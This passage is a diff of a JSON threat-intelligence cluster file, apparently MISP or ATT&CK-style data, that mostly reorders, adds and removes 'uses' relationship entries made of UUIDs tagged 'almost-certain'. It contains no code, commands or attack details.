@@ -15605,62 +17880,6 @@ ], "type": "uses" }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ 
@@ -15668,34 +17887,6 @@ ], "type": "uses" }, - { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", "tags": [ @@ -15703,6 +17894,34 @@ ], "type": "uses" }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ 
@@ -15710,6 +17929,34 @@ ], "type": "uses" }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", "tags": [ @@ -15723,6 +17970,34 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "09b2cd76-c674-47cc-9f57-d2f2ad150a46", 
@@ -15766,63 +18041,7 @@ "type": "uses" }, { - "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -15836,14 +18055,14 @@ "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -15856,27 +18075,6 @@ ], "type": "uses" }, - { - "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", "tags": [ @@ -15885,28 +18083,35 @@ "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -15919,12 +18124,82 @@ ], "type": "uses" }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "92ec0cbd-2c30-44a2-b270-73f4ec949841", 
@@ -15974,20 +18249,6 @@ ], "type": "uses" }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", "tags": [ @@ -15995,55 +18256,6 @@ ], "type": "uses" }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", "tags": [ 
@@ -16052,14 +18264,42 @@ "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -16072,6 +18312,34 @@ ], "type": "uses" }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", "tags": [ 
@@ -16080,7 +18348,14 @@ "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -16120,6 +18395,13 @@ ], "type": "uses" }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ @@ -16134,13 +18416,6 @@ ], "type": "uses" }, - { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", "tags": [ @@ -16230,6 +18505,20 @@ ], "type": "uses" }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ @@ -16237,6 +18526,20 @@ ], "type": "uses" }, + { + "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ 
@@ -16250,34 +18553,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "f6d1d2cb-12f5-4221-9636-44606ea1f3f8", @@ -16320,6 +18595,13 @@ ], "type": "uses" }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "4ae4f953-fe58-4cc8-a327-33257e30a830", "tags": [ @@ -16340,13 +18622,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "9ca488bd-9587-48ef-b923-1743523e63b2", @@ -16376,14 +18651,14 @@ "type": "uses" }, { - "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -16438,14 +18713,14 @@ "type": "uses" }, { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -16541,14 +18816,14 @@ "type": "uses" }, { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -16589,6 +18864,27 @@ ], "type": "uses" }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ @@ -16604,7 +18900,14 @@ "type": "uses" }, { - "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -16617,40 +18920,12 @@ ], "type": "uses" }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "1cc934e4-b01d-4543-a011-b988dfc1a458", @@ -16681,13 +18956,6 @@ ], "type": "uses" }, - { - "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", "tags": [ @@ -16696,7 +18964,14 @@ "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6e6845c2-347a-4a6f-a2d1-b74a18ebd352", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -16717,14 +18992,14 @@ "type": "uses" }, { - "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "6e6845c2-347a-4a6f-a2d1-b74a18ebd352", + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -16778,20 +19053,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", "tags": [ @@ -16812,6 +19073,20 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "e48df773-7c95-4a4c-ba70-ea3d15900148", 
@@ -16850,14 +19125,35 @@ "type": "uses" }, { - "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "514ede4c-78b3-4d78-a38b-daddf6217a79", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -16870,6 +19166,27 @@ ], "type": "uses" }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", "tags": [ @@ -16877,6 +19194,20 @@ ], "type": "uses" }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ 
@@ -16892,63 +19223,7 @@ "type": "uses" }, { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "514ede4c-78b3-4d78-a38b-daddf6217a79", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -16989,6 +19264,20 @@ ], "type": "uses" }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", "tags": [ 
@@ -17010,26 +19299,12 @@ ], "type": "uses" }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "5c6ed2dc-37f4-40ea-b2e1-4c76140a388c", @@ -17080,13 +19355,6 @@ ], "type": "uses" }, - { - "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", "tags": [ @@ -17100,6 +19368,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "9752aef4-a1f3-4328-929f-b64eb0536090", @@ -17139,7 +19414,7 @@ "type": "uses" }, { - "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", + "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", "tags": [ 